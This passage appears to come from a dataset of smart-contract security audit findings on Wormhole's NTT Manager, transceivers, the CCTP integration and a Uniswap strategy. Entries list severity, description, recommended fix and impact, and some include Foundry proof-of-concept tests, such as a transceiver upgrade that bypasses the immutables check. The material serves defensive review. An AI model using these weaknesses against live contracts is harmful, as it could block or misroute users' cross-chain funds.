!= 0, "Threshold is zero with active transceivers");\\n\\n // Actually set it\\n nttManagerChain1.setThreshold(2);\\n nttManagerChain2.setThreshold(1);\\n }\\n\\n function testTransceiverModification() external {\\n vm.chainId(chainId1);\\n\\n // Setting up the transfer\\n DummyToken token1 = DummyToken(nttManagerChain1.token());\\n uint8 decimals = token1.decimals();\\n\\n token1.mintDummy(address(userA), 5 * 10 ** decimals);\\n uint256 outboundLimit = 4 * 10 ** decimals;\\n nttManagerChain1.setOutboundLimit(outboundLimit);\\n\\n vm.startPrank(userA);\\n\\n uint256 transferAmount = 5 * 10 ** decimals;\\n token1.approve(address(nttManagerChain1), transferAmount);\\n\\n // transfer with shouldQueue == true\\n uint64 qSeq = nttManagerChain1.transfer(\\n transferAmount, chainId2, toWormholeFormat(userB), true, encodeTransceiverInstructions(true)\\n );\\n vm.stopPrank();\\n\\n assertEq(qSeq, 0);\\n IRateLimiter.OutboundQueuedTransfer memory qt = nttManagerChain1.getOutboundQueuedTransfer(0);\\n assertEq(qt.amount.getAmount(), transferAmount.trim(decimals, decimals).getAmount());\\n assertEq(qt.recipientChain, chainId2);\\n assertEq(qt.recipient, toWormholeFormat(userB));\\n assertEq(qt.txTimestamp, initialBlockTimestamp);\\n\\n // assert that the contract also locked funds from the user\\n assertEq(token1.balanceOf(address(userA)), 0);\\n assertEq(token1.balanceOf(address(nttManagerChain1)), transferAmount);\\n\\n\\n // elapse some random time - 60 seconds\\n uint256 durationElapsedTime = initialBlockTimestamp + 60;\\n\\n // now add a third transceiver\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver3Chain1));\\n\\n // verify that the third transceiver is added\\n assertEq(nttManagerChain1.getTransceivers().length, 3);\\n\\n // remove second transceiver\\n nttManagerChain1.removeTransceiver(address(wormholeTransceiver2Chain1));\\n\\n // verify that the second transceiver is removed\\n assertEq(nttManagerChain1.getTransceivers().length, 2);\\n\\n // elapse rate limit duration\\n durationElapsedTime = initialBlockTimestamp + nttManagerChain1.rateLimitDuration();\\n\\n vm.warp(durationElapsedTime);\\n\\n vm.expectRevert(stdError.indexOOBError); //index out of bounds - transceiver instructions array does not have a third element to access\\n nttManagerChain1.completeOutboundQueuedTransfer(0);\\n }\\n\\n // Encode an instruction for each of the relayers\\n function encodeTransceiverInstructions(bool relayer_off) public view returns (bytes memory) {\\n WormholeTransceiver.WormholeTransceiverInstruction memory instruction =\\n IWormholeTransceiver.WormholeTransceiverInstruction(relayer_off);\\n\\n bytes memory encodedInstructionWormhole =\\n wormholeTransceiverChain1.encodeWormholeTransceiverInstruction(instruction);\\n\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction1 =\\n TransceiverStructs.TransceiverInstruction({index: 0, payload: encodedInstructionWormhole});\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction2 =\\n TransceiverStructs.TransceiverInstruction({index: 1, payload: encodedInstructionWormhole});\\n\\n TransceiverStructs.TransceiverInstruction[] memory TransceiverInstructions =\\n new TransceiverStructs.TransceiverInstruction[](2);\\n\\n TransceiverInstructions[0] = TransceiverInstruction1;\\n TransceiverInstructions[1] = TransceiverInstruction2;\\n\\n return TransceiverStructs.encodeTransceiverInstructions(TransceiverInstructions);\\n }\\n}\\n```\\n
```\\n/* snip */\\n// now check rate limits\\nbool isAmountRateLimited = _isOutboundAmountRateLimited(internalAmount);\\nif (!shouldQueue && isAmountRateLimited) {\\n revert NotEnoughCapacity(getCurrentOutboundCapacity(), amount);\\n}\\nif (shouldQueue && isAmountRateLimited) {\\n // emit an event to notify the user that the transfer is rate limited\\n emit OutboundTransferRateLimited(\\n msg.sender, sequence, amount, getCurrentOutboundCapacity()\\n );\\n\\n // queue up and return\\n _enqueueOutboundTransfer(\\n sequence,\\n trimmedAmount,\\n recipientChain,\\n recipient,\\n msg.sender,\\n transceiverInstructions\\n );\\n\\n // refund price quote back to sender\\n _refundToSender(msg.value);\\n\\n // return the sequence in the queue\\n return sequence;\\n}\\n/* snip */\\n```\\n
Silent overflow in `TrimmedAmount::shift` could result in rate limiter being bypassed
medium
Within `TrimmedAmount::trim`, there is an explicit check that ensures the scaled amount does not exceed the maximum uint64:\\n```\\n// NOTE: amt after trimming must fit into uint64 (that's the point of\\n// trimming, as Solana only supports uint64 for token amts)\\nif (amountScaled > type(uint64).max) {\\n revert AmountTooLarge(amt);\\n}\\n```\\n\\nHowever, no such check exists within `TrimmedAmount::shift` which means there is potential for silent overflow when casting to `uint64` here:\\n```\\nfunction shift(\\n TrimmedAmount memory amount,\\n uint8 toDecimals\\n) internal pure returns (TrimmedAmount memory) {\\n uint8 actualToDecimals = minUint8(TRIMMED_DECIMALS, toDecimals);\\n return TrimmedAmount(\\n uint64(scale(amount.amount, amount.decimals, actualToDecimals)), actualToDecimals\\n );\\n}\\n```\\n
Explicitly check the scaled amount in `TrimmedAmount::shift` does not exceed the maximum `uint64`.
A silent overflow in `TrimmedAmount::shift` could result in the rate limiter being bypassed, considering its usage in `NttManager::_transferEntryPoint`. Given the high impact and reasonable likelihood of this issue occurring, it is classified a MEDIUM severity finding.
```\\n// NOTE: amt after trimming must fit into uint64 (that's the point of\\n// trimming, as Solana only supports uint64 for token amts)\\nif (amountScaled > type(uint64).max) {\\n revert AmountTooLarge(amt);\\n}\\n```\\n
Disabled Transceivers cannot be re-enabled by calling `TransceiverRegistry::_setTransceiver` after 64 have been registered
medium
`TransceiverRegistry::_setTransceiver` handles the registering of Transceivers, but note that they cannot be re-registered as this has other downstream effects, so this function is also responsible for the re-enabling of previously registered but currently disabled Transceivers.\\n```\\nfunction _setTransceiver(address transceiver) internal returns (uint8 index) {\\n /* snip */\\n if (transceiver == address(0)) {\\n revert InvalidTransceiverZeroAddress();\\n }\\n\\n if (_numTransceivers.registered >= MAX_TRANSCEIVERS) {\\n revert TooManyTransceivers();\\n }\\n\\n if (transceiverInfos[transceiver].registered) {\\n transceiverInfos[transceiver].enabled = true;\\n } else {\\n /* snip */\\n}\\n```\\n\\nThis function reverts if the passed transceiver address is `address(0)` or the number of registered transceivers is already at its defined maximum of 64. Assuming a total of 64 registered Transceivers, with some of these Transceivers having been previously disabled, the placement of this latter validation will prevent a disabled Transceiver from being re-enabled since the subsequent block in which the storage indicating its enabled state is set to `true` is not reachable. Consequently, it will not be possible to re-enable any disabled transceivers after having registered the maximum number of Transceivers, meaning that this function will never be callable without redeployment.
Move the placement of the maximum Transceivers validation to within the `else` block that is responsible for handling the registration of new Transceivers.
Under normal circumstances, this maximum number of registered Transceivers should never be reached, especially since the underlying Transceivers are upgradeable. However, while unlikely based on operational assumptions, this undefined behavior could have a high impact, and so this is classified as a MEDIUM severity finding.
```\\nfunction _setTransceiver(address transceiver) internal returns (uint8 index) {\\n /* snip */\\n if (transceiver == address(0)) {\\n revert InvalidTransceiverZeroAddress();\\n }\\n\\n if (_numTransceivers.registered >= MAX_TRANSCEIVERS) {\\n revert TooManyTransceivers();\\n }\\n\\n if (transceiverInfos[transceiver].registered) {\\n transceiverInfos[transceiver].enabled = true;\\n } else {\\n /* snip */\\n}\\n```\\n
NTT Manager cannot be unpaused once paused
medium
`NttManagerState::pause` exposes pause functionality to be triggered by permissioned actors but has no corresponding unpause functionality. As such, once the NTT Manager is paused, it will not be possible to unpause without a contract upgrade.\\n```\\nfunction pause() public onlyOwnerOrPauser {\\n _pause();\\n}\\n```\\n
```\\n// Add the line below\\n function unpause() public onlyOwnerOrPauser {\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\n
The inability to unpause the NTT Manager could result in significant disruption, requiring either a contract upgrade or complete redeployment to resolve this issue.
```\\nfunction pause() public onlyOwnerOrPauser {\\n _pause();\\n}\\n```\\n
Transceiver invariants and ownership synchronicity can be broken by unsafe Transceiver upgrades
medium
Transceivers are upgradeable contracts integral to the cross-chain message handling of NTT tokens. While `WormholeTransceiver` is a specific implementation of the `Transceiver` contract, NTT Managers can integrate with Transceivers of any custom implementation.\\n`Transceiver::_checkImmutables` is an internal virtual function that verifies that invariants are not violated during an upgrade. Two checks in this function are that a) the NTT Manager address remains the same and b) the underlying NTT token address remains the same.\\nHowever, the current logic allows integrators to bypass these checks by either:\\nOverriding the `_checkImmutables()` function without the above checks.\\nCalling `Implementation::_setMigratesImmutables` with a `true` input. This effectively bypasses the `_checkImmutables()` function validation during an upgrade.\\nBased on the understanding that Transceivers are deployed by integrators external to NTT Manager owners, regardless of the high trust assumptions associated with integrators, it is risky for NTT Managers to delegate power to Transceivers to silently upgrade a transceiver contract that can potentially violate the NTT Manager invariants.\\nOne example of this involves the intended ownership model. Within `Transceiver::_initialize`, the owner of the Transceiver is set to the owner of the `NttManager` contract:\\n```\\nfunction _initialize() internal virtual override {\\n // check if the owner is the deployer of this contract\\n if (msg.sender != deployer) {\\n revert UnexpectedDeployer(deployer, msg.sender);\\n }\\n\\n __ReentrancyGuard_init();\\n // owner of the transceiver is set to the owner of the nttManager\\n __PausedOwnable_init(msg.sender, getNttManagerOwner());\\n}\\n```\\n\\nHowever, the transferring of this ownership via `Transceiver::transferTransceiverOwnership` is only allowed by the NTT Manager itself:\\n```\\n/// @dev transfer the ownership of the transceiver to a new address\\n/// the nttManager should be able to update transceiver ownership.\\nfunction transferTransceiverOwnership(address newOwner) external onlyNttManager {\\n _transferOwnership(newOwner);\\n}\\n```\\n\\nWhen the owner of the NTT Manager is changed by calling `NttManagerState::transferOwnership`, the owner of all the Transceivers is changed with it:\\n```\\n/// @notice Transfer ownership of the Manager contract and all Endpoint contracts to a new owner.\\nfunction transferOwnership(address newOwner) public override onlyOwner {\\n super.transferOwnership(newOwner);\\n // loop through all the registered transceivers and set the new owner of each transceiver to the newOwner\\n address[] storage _registeredTransceivers = _getRegisteredTransceiversStorage();\\n _checkRegisteredTransceiversInvariants();\\n\\n for (uint256 i = 0; i < _registeredTransceivers.length; i++) {\\n ITransceiver(_registeredTransceivers[i]).transferTransceiverOwnership(newOwner);\\n }\\n}\\n```\\n\\nThis design is intended to ensure that the NTT Manager's owner is kept in sync across all transceivers, access-controlled to prevent unauthorized ownership changes, but transceiver ownership can still be transferred directly as the public `OwnableUpgradeable::transferOwnership` function has not been overridden. Even if Transceiver ownership changes, the Manager is permitted to change it again via the above function.\\nHowever, this behavior can be broken if the new owner of a Transceiver performs a contract upgrade without the immutables check. In this way, they can change the NTT Manager, preventing the correct manager from having permissions as expected. As a result, `NttManagerState::transferOwnership` will revert if any one Transceiver is out of sync with the others, and since it is not possible to remove an already registered transceiver, this function will cease to be useful. Instead, each Transceiver will be forced to be manually updated to the new owner unless the modified Transceiver is reset back to the previous owner so that this function can be called again.
Consider making `Transceiver::_checkImmutables` and `Implementation::_setMigratesImmutables` private functions for Transceivers. If the `_checkImmutables()` function has to be overridden, consider exposing another function that is called inside `_checkImmutables` as follows:\\n```\\nfunction _checkImmutables() private view override {\\n assert(this.nttManager() == nttManager);\\n assert(this.nttManagerToken() == nttManagerToken);\\n _checkAdditionalImmutables();\\n}\\n\\nfunction _checkAdditionalImmutables() private view virtual override {}\\n```\\n
While this issue may require the owner of a Transceiver to misbehave, a scenario where a Transceiver is silently upgraded with a new NTT Manager or NTT Manager token can be problematic for cross-chain transfers and so is prescient to note.\\nProof of Concept: The below PoC calls the `_setMigratesImmutables()` function with the `true` boolean, effectively bypassing the `_checkImmutables()` invariant check. As a result, a subsequent call to `NttManagerState::transferOwnership` is demonstrated to revert. This test should be added to the contract in `Upgrades.t.sol` before running, and the revert in `MockWormholeTransceiverContract::transferOwnership` should be removed to reflect the `true` functionality.\\n```\\nfunction test_immutableUpgradePoC() public {\\n // create the new mock ntt manager contract\\n NttManager newImpl = new MockNttManagerContract(\\n nttManagerChain1.token(), IManagerBase.Mode.BURNING, chainId1, 1 days, false\\n );\\n MockNttManagerContract newNttManager =\\n MockNttManagerContract(address(new ERC1967Proxy(address(newImpl), "")));\\n newNttManager.initialize();\\n\\n // transfer transceiver ownership\\n wormholeTransceiverChain1.transferOwnership(makeAddr("new transceiver owner"));\\n\\n // create the new transceiver implementation, specifying the new ntt manager\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverImmutableAllow(\\n address(newNttManager),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n // perform the transceiver upgrade\\n wormholeTransceiverChain1.upgrade(address(wormholeTransceiverChain1Implementation));\\n\\n // ntt manager ownership transfer should fail and revert\\n vm.expectRevert(abi.encodeWithSelector(ITransceiver.CallerNotNttManager.selector, address(this)));\\n nttManagerChain1.transferOwnership(makeAddr("new ntt manager owner"));\\n}\\n```\\n
```\\nfunction _initialize() internal virtual override {\\n // check if the owner is the deployer of this contract\\n if (msg.sender != deployer) {\\n revert UnexpectedDeployer(deployer, msg.sender);\\n }\\n\\n __ReentrancyGuard_init();\\n // owner of the transceiver is set to the owner of the nttManager\\n __PausedOwnable_init(msg.sender, getNttManagerOwner());\\n}\\n```\\n
Asymmetry in Transceiver pausing capability
low
Pausing functionality is exposed via Transceiver::_pauseTransceiver; however, there is no corresponding function that exposes unpausing functionality:\\n```\\n/// @dev pause the transceiver.\\nfunction _pauseTransceiver() internal {\\n _pause();\\n}\\n```\\n
```\\n// Add the line below\\n /// @dev unpause the transceiver.\\n// Add the line below\\n function _unpauseTransceiver() internal {\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\n
While not an immediate issue since the above function is not currently in use anywhere, this should be resolved to avoid cases where Transceivers could become permanently paused.
```\\n/// @dev pause the transceiver.\\nfunction _pauseTransceiver() internal {\\n _pause();\\n}\\n```\\n
Incorrect Transceiver payload prefix definition
low
The `WH_TRANSCEIVER_PAYLOAD_PREFIX` constant in `WormholeTransceiverState.sol` contains invalid ASCII bytes and, as such, does not match what is written in the inline developer documentation:\\n```\\n/// @dev Prefix for all TransceiverMessage payloads\\n/// This is 0x99'E''W''H'\\n/// @notice Magic string (constant value set by messaging provider) that idenfies the payload as an transceiver-emitted payload.\\n/// Note that this is not a security critical field. It's meant to be used by messaging providers to identify which messages are Transceiver-related.\\nbytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x9945FF10;\\n```\\n\\nThe correct payload prefix is `0x99455748`, which is output when running the following command:\\n```\\ncast --from-utf8 "EWH"\\n```\\n
Update the constant definition to use the correct prefix corresponding to the documented string:\\n```\\n// Add the line below\\n bytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x99455748;\\n```\\n
While still a valid 4-byte hex prefix, used purely for identification purposes, an incorrect prefix could cause downstream confusion and result in otherwise valid Transceiver payloads being incorrectly prefixed.
```\\n/// @dev Prefix for all TransceiverMessage payloads\\n/// This is 0x99'E''W''H'\\n/// @notice Magic string (constant value set by messaging provider) that idenfies the payload as an transceiver-emitted payload.\\n/// Note that this is not a security critical field. It's meant to be used by messaging providers to identify which messages are Transceiver-related.\\nbytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x9945FF10;\\n```\\n
Redemptions are blocked when L2 sequencers are down
medium
Given that rollups such as Optimism and Arbitrum offer methods for forced transaction inclusion, it is important that the aliased sender address is also checked within `Logic::redeemTokensWithPayload` when verifying the sender is the specified `mintRecipient` to allow for maximum uptime in the event of sequencer downtime.\\n```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, "caller must be mintRecipient"\\n);\\n```\\n
Validation of the sender address against the `mintRecipient` should also consider the aliased `mintRecipient` address to allow for maximum uptime when `Logic::redeemTokensWithPayload` is called via forced inclusion.
Failure to consider the aliased `mintRecipient` address prevents the execution of valid VAAs on a target CCTP domain where transactions are batched by a centralized L2 sequencer. Since this VAA could carry a time-sensitive payload, such as the urgent cross-chain liquidity infusion to a protocol, this issue has the potential to have a high impact with reasonable likelihood.\\nProof of Concept:\\nProtocol X attempts to transfer 10,000 USDC from CCTP Domain A to CCTP Domain B.\\nCCTP Domain B is an L2 rollup that batches transactions for publishing onto the L1 chain via a centralized sequencer.\\nThe L2 sequencer goes down; however, transactions can still be executed via forced inclusion on the L1 chain.\\nProtocol X implements the relevant functionality and attempts to redeem 10,000 USDC via forced inclusion.\\nThe Wormhole CCTP integration does not consider the contract's aliased address when validating the `mintRecipient`, so the redemption fails.\\nCross-chain transfer of this liquidity will remain blocked so long as the sequencer is down.
```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, "caller must be mintRecipient"\\n);\\n```\\n
Potentially dangerous out-of-bounds memory access in `BytesParsing::sliceUnchecked`
low
`BytesParsing::sliceUnchecked` currently bails early for the degenerate case when the slice `length` is zero; however, there is no validation on the `length` of the `encoded` bytes parameter `encoded` itself. If the `length` of `encoded` is less than the slice `length`, then it is possible to access memory out-of-bounds.\\n```\\nfunction sliceUnchecked(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n //bail early for degenerate case\\n if (length == 0) {\\n return (new bytes(0), offset);\\n }\\n\\n assembly ("memory-safe") {\\n nextOffset := add(offset, length)\\n ret := mload(freeMemoryPtr)\\n\\n /* snip: inline dev comments */\\n\\n let shift := and(length, 31) //equivalent to `mod(length, 32)` but 2 gas cheaper\\n if iszero(shift) { shift := wordSize }\\n\\n let dest := add(ret, shift)\\n let end := add(dest, length)\\n for { let src := add(add(encoded, shift), offset) } lt(dest, end) {\\n src := add(src, wordSize)\\n dest := add(dest, wordSize)\\n } { mstore(dest, mload(src)) }\\n\\n mstore(ret, length)\\n //When compiling with --via-ir then normally allocated memory (i.e. via new) will have 32 byte\\n // memory alignment and so we enforce the same memory alignment here.\\n mstore(freeMemoryPtr, and(add(dest, 31), not(31)))\\n }\\n}\\n```\\n\\nSince the `for` loop begins at the offset of `encoded` in memory, accounting `for` its `length` and accompanying `shift` calculation depending on the `length` supplied, and execution continues so long as `dest` is less than `end`, it is possible to continue loading additional words out of bounds simply by passing larger `length` values. Therefore, regardless of the `length` of the original bytes, the output slice will always have a size defined by the `length` parameter.\\nIt is understood that this is known behavior due to the unchecked nature of this function and the accompanying checked version, which performs validation on the `nextOffset` return value compared with the length of the encoded bytes.\\n```\\nfunction slice(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n (ret, nextOffset) = sliceUnchecked(encoded, offset, length);\\n checkBound(nextOffset, encoded.length);\\n}\\n```\\n\\nIt has not been possible within the constraints of this review to identify a valid scenario in which malicious calldata can make use of this behavior to launch a successful exploit; however, this is not a guarantee that the usage of this library function is bug-free since there do exist certain quirks related to the loading of calldata.
Consider bailing early if the length of the bytes from which to construct a slice is zero, and always ensure the resultant offset is correctly validated against the length when using the unchecked version of the function.
The impact is limited in the context of the library function's usage in the scope of this review; however, it is advisable to check any other usage elsewhere and in the future to ensure that this behavior cannot be weaponized. `BytesParsing::sliceUnchecked` is currently only used in `WormholeCctpMessages::_decodeBytes`, which itself is called in `WormholeCctpMessages::decodeDeposit`. This latter function is utilized in two places:
```\\nfunction sliceUnchecked(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n //bail early for degenerate case\\n if (length == 0) {\\n return (new bytes(0), offset);\\n }\\n\\n assembly ("memory-safe") {\\n nextOffset := add(offset, length)\\n ret := mload(freeMemoryPtr)\\n\\n /* snip: inline dev comments */\\n\\n let shift := and(length, 31) //equivalent to `mod(length, 32)` but 2 gas cheaper\\n if iszero(shift) { shift := wordSize }\\n\\n let dest := add(ret, shift)\\n let end := add(dest, length)\\n for { let src := add(add(encoded, shift), offset) } lt(dest, end) {\\n src := add(src, wordSize)\\n dest := add(dest, wordSize)\\n } { mstore(dest, mload(src)) }\\n\\n mstore(ret, length)\\n //When compiling with --via-ir then normally allocated memory (i.e. via new) will have 32 byte\\n // memory alignment and so we enforce the same memory alignment here.\\n mstore(freeMemoryPtr, and(add(dest, 31), not(31)))\\n }\\n}\\n```\\n
A given CCTP domain can be registered for multiple foreign chains due to insufficient validation in `Governance::registerEmitterAndDomain`
low
`Governance::registerEmitterAndDomain` is a Governance action that is used to register the emitter address and corresponding CCTP domain for a given foreign chain. Validation is currently performed to ensure that the registered CCTP domain of the foreign chain is not equal to that of the local chain; however, there is no such check to ensure that the given CCTP domain has not already been registered for a different foreign chain. In this case, where the CCTP domain of an existing foreign chain is mistakenly used in the registration of a new foreign chain, the `getDomainToChain` mapping of an existing CCTP domain will be overwritten to the most recently registered foreign chain. Given the validation that prevents foreign chains from being registered again, without a method for updating an already registered emitter, it will not be possible to correct this corruption of state.\\n```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // For now, ensure that we cannot register the same foreign chain again.\\n require(registeredEmitters[foreignChain] == 0, "chain already registered");\\n\\n /* snip: additional parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n
Consider adding the following validation when registering a CCTP domain for a foreign chain:\\n```\\n// Add the line below\\n require (getDomainToChain()[cctpDomain] == 0, "CCTP domain already registered for a different foreign chain");\\n```\\n
The impact of this issue in the current scope is limited since the corrupted state is only ever queried in a public view function; however, if it is important for third-party integrators, then this has the potential to cause downstream issues.\\nProof of Concept:\\nCCTP Domain A is registered for foreign chain identifier X.\\nCCTP Domain A is again registered, this time for foreign chain identifier Y.\\nThe `getDomainToChain` mapping for CCTP Domain A now points to foreign chain identifier Y, while the `getChainToDomain` mapping for both X and Y now points to CCTP domain A.
```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // For now, ensure that we cannot register the same foreign chain again.\\n require(registeredEmitters[foreignChain] == 0, "chain already registered");\\n\\n /* snip: additional parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n
Lack of Governance action to update registered emitters
low
The Wormhole CCTP integration contract currently exposes a function `Governance::registerEmitterAndDomain` to register an emitter address and its corresponding CCTP domain on the given foreign chain; however, no such function currently exists to update this state. Any mistake made when registering the emitter and CCTP domain is irreversible unless an upgrade is performed on the entirety of the integration contract itself. Deployment of protocol upgrades comes with its own risks and should not be performed as a necessary fix for trivial human errors. Having a separate governance action to update the emitter address, foreign chain identifier, and CCTP domain is a preferable pre-emptive measure against any potential human errors.\\n```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n
The addition of a `Governance::updateEmitterAndDomain` function is recommended to allow Governance to more easily respond to any issues with the registered emitter state.
In the event an emitter is registered with an incorrect foreign chain identifier or CCTP domain, then a protocol upgrade will be required to mitigate this issue. As such, the risks associated with the deployment of protocol upgrades and the potential time-sensitive nature of this issue designate a low severity issue.\\nProof of Concept:\\nA Governance VAA erroneously registers an emitter with the incorrect foreign chain identifier.\\nA Governance upgrade is now required to re-initialize this state so that the correct foreign chain identifier can be associated with the given emitter address.
```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n
Temporary denial-of-service when in-flight messages are not executed before a deprecated Wormhole Guardian set expires
low
Wormhole exposes a governance action in `Governance::submitNewGuardianSet` to update the Guardian set via Governance VAA.\\n```\\nfunction submitNewGuardianSet(bytes memory _vm) public {\\n // rest of code\\n\\n // Trigger a time-based expiry of current guardianSet\\n expireGuardianSet(getCurrentGuardianSetIndex());\\n\\n // Add the new guardianSet to guardianSets\\n storeGuardianSet(upgrade.newGuardianSet, upgrade.newGuardianSetIndex);\\n\\n // Makes the new guardianSet effective\\n updateGuardianSetIndex(upgrade.newGuardianSetIndex);\\n}\\n```\\n\\nWhen this function is called, `Setters:: expireGuardianSet` initiates a 24-hour timeframe after which the current guardian set expires.\\n```\\nfunction expireGuardianSet(uint32 index) internal {\\n _state.guardianSets[index].expirationTime = uint32(block.timestamp) + 86400;\\n}\\n```\\n\\nHence, any in-flight VAAs that utilize the deprecated Guardian set index will fail to be executed given the validation present in `Messages::verifyVMInternal`.\\n```\\n/// @dev Checks if VM guardian set index matches the current index (unless the current set is expired).\\nif(vm.guardianSetIndex != getCurrentGuardianSetIndex() && guardianSet.expirationTime < block.timestamp){\\n return (false, "guardian set has expired");\\n}\\n```\\n\\nConsidering there is no automatic relaying of Wormhole CCTP messages, counter to what is specified in the documentation (unless an integrator implements their own relayer), there are no guarantees that an in-flight message which utilizes an old Guardian set index will be executed by the `mintRecipient` on the target domain within its 24-hour expiration period. This could occur, for example, in cases such as:\\nIntegrator messages are blocked by their use of the Wormhole nonce/sequence number.\\nCCTP contracts are paused on the target domain, causing all redemptions to revert.\\nL2 sequencer downtime, since the Wormhole CCTP integration contracts do not consider aliased addresses for forced inclusion.\\nThe `mintRecipient` is a contract that has been paused following an exploit, temporarily restricting all incoming and outgoing transfers.\\nIn the current design, it is not possible to update the `mintRecipient` for a given deposit due to the multicast nature of VAAs. CCTP exposes `MessageTransmitter::replaceMessage` which allows the original source caller to update the destination caller for a given message and its corresponding attestation; however, the Wormhole CCTP integration currently provides no access to this function and has no similar functionality of its own to allow updates to the target `mintRecipient` of the VAA.\\nAdditionally, there is no method for forcibly executing the redemption of USDC/EURC to the `mintRecipient`, which is the only address allowed to execute the VAA on the target domain, as validated in `Logic::redeemTokensWithPayload`.\\n```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, "caller must be mintRecipient"\\n);\\n```\\n\\nWithout any programmatic method for replacing expired VAAs with new VAAs signed by the updated Guardian set, the source USDC/EURC will be burnt, but it will not be possible for the expired VAAs to be executed, leading to denial-of-service on the `mintRecipient` receiving tokens on the target domain. The Wormhole CCTP integration does, however, inherit some mitigations already in place for this type of scenario where the Guardian set is updated, as explained in the Wormhole whitepaper, meaning that it is possible to repair or otherwise replace the expired VAA for execution using signatures from the new Guardian set. In all cases, the original VAA metadata remains intact since the new VAA Guardian signatures refer to an event that has already been emitted, so none of the contents of the VAA payload besides the Guardian set index and associated signatures change on re-observation. This means that the new VAA can be safely paired with the existing Circle attestation for execution on the target domain by the original `mintRecipient`.
The practicality of executing the proposed Governance mitigations at scale should be carefully considered, given the extent to which USDC is entrenched within the wider DeFi ecosystem. There is a high likelihood of temporary widespread, high-impact DoS, although this is somewhat limited by the understanding that Guardian set updates are expected to occur relatively infrequently, given there have only been three updates in the lifetime of Wormhole so far. There is also potentially insufficient tooling for the detailed VAA re-observation scenarios, which should handle the recombination of the signed CCTP message with the new VAA and clearly communicate these considerations to integrators.
There is only a single address that is permitted to execute a given VAA on the target domain; however, there are several scenarios that have been identified where this `mintReceipient` may be unable to perform redemption for a period in excess of 24 hours following an update to the Guardian set while the VAA is in-flight. Fortunately, Wormhole Governance has a well-defined path to resolution, so the impact is limited.\\nProof of Concept:\\nAlice burns 100 USDC to be transferred to dApp X from CCTP Domain A to CCTP Domain B.\\nWormhole executes a Governance VAA to update the Guardian set.\\n24 hours pass, causing the previous Guardian set to expire.\\ndApp X attempts to redeem 100 USDC on CCTP Domain B, but VAA verification fails because the message was signed using the expired Guardian set.\\nThe 100 USDC remains burnt and cannot be minted on the target domain by executing the attested CCTP message until the expired VAA is reobserved by members of the new Guardian set.
```\\nfunction submitNewGuardianSet(bytes memory _vm) public {\\n // rest of code\\n\\n // Trigger a time-based expiry of current guardianSet\\n expireGuardianSet(getCurrentGuardianSetIndex());\\n\\n // Add the new guardianSet to guardianSets\\n storeGuardianSet(upgrade.newGuardianSet, upgrade.newGuardianSetIndex);\\n\\n // Makes the new guardianSet effective\\n updateGuardianSetIndex(upgrade.newGuardianSetIndex);\\n}\\n```\\n
`StrategyPassiveManagerUniswap` gives ERC20 token allowances to `unirouter` but doesn't remove allowances when `unirouter` is updated
medium
`StrategyPassiveManagerUniswap` gives ERC20 token allowances to unirouter:\\n```\\nfunction _giveAllowances() private {\\n IERC20Metadata(lpToken0).forceApprove(unirouter, type(uint256).max);\\n IERC20Metadata(lpToken1).forceApprove(unirouter, type(uint256).max);\\n}\\n```\\n\\n`unirouter` is inherited from `StratFeeManagerInitializable` which has an external function `setUnirouter` which allows `unirouter` to be changed:\\n```\\n function setUnirouter(address _unirouter) external onlyOwner {\\n unirouter = _unirouter;\\n emit SetUnirouter(_unirouter);\\n}\\n```\\n\\nThe allowances can only be removed by calling `StrategyPassiveManagerUniswap::panic` however `unirouter` can be changed any time via the `setUnirouter` function.\\nThis allows the contract to enter a state where `unirouter` is updated via `setUnirouter` but the ERC20 token approvals given to the old `unirouter` are not removed.
